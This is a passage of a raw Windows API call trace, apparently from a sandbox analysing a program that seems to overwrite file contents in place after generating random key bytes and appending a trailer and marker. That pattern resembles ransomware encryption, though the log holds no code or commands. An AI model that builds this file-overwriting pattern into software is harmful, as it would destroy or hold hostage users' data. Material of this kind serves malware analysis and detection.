0x7d7f878 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.277] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.277] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.278] GetProcessHeap () returned 0x4f10000 [0083.278] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.279] SetFilePointerEx (in: hFile=0x92c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.279] WriteFile (in: hFile=0x92c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.279] WriteFile (in: hFile=0x92c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.279] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.279] GetProcessHeap () returned 0x4f10000 [0083.280] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.280] CloseHandle (hObject=0x92c) returned 1 [0083.280] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 107 [0083.318] SetFilePointerEx (in: hFile=0x93c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.318] ReadFile (in: hFile=0x93c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.318] SetFilePointerEx (in: hFile=0x93c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.318] GetProcessHeap () returned 0x4f10000 [0083.318] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.318] GetProcessHeap () returned 0x4f10000 [0083.318] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.318] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.318] GetProcessHeap () returned 0x4f10000 [0083.318] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.318] ReadFile (in: hFile=0x93c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.321] SetFilePointerEx (in: hFile=0x93c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.321] WriteFile (in: hFile=0x93c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.321] GetProcessHeap () returned 0x4f10000 [0083.321] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.322] GetProcessHeap () returned 0x4f10000 [0083.322] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.323] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.323] GetProcessHeap () returned 0x4f10000 [0083.324] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.324] GetProcessHeap () returned 0x4f10000 [0083.324] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.325] GetProcessHeap () returned 0x4f10000 [0083.325] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.326] SetFilePointerEx (in: hFile=0x93c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.326] WriteFile (in: hFile=0x93c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.326] WriteFile (in: hFile=0x93c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.326] GetProcessHeap () returned 0x4f10000 [0083.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.326] CloseHandle (hObject=0x93c) returned 1 [0083.327] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 111 [0083.332] SetFilePointerEx (in: hFile=0x940, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.332] ReadFile (in: hFile=0x940, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.332] SetFilePointerEx (in: hFile=0x940, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.332] GetProcessHeap () returned 0x4f10000 [0083.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.332] GetProcessHeap () returned 0x4f10000 [0083.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.332] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.333] GetProcessHeap () returned 0x4f10000 [0083.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.333] ReadFile (in: hFile=0x940, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.405] SetFilePointerEx (in: hFile=0x940, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.405] WriteFile (in: hFile=0x940, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.405] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 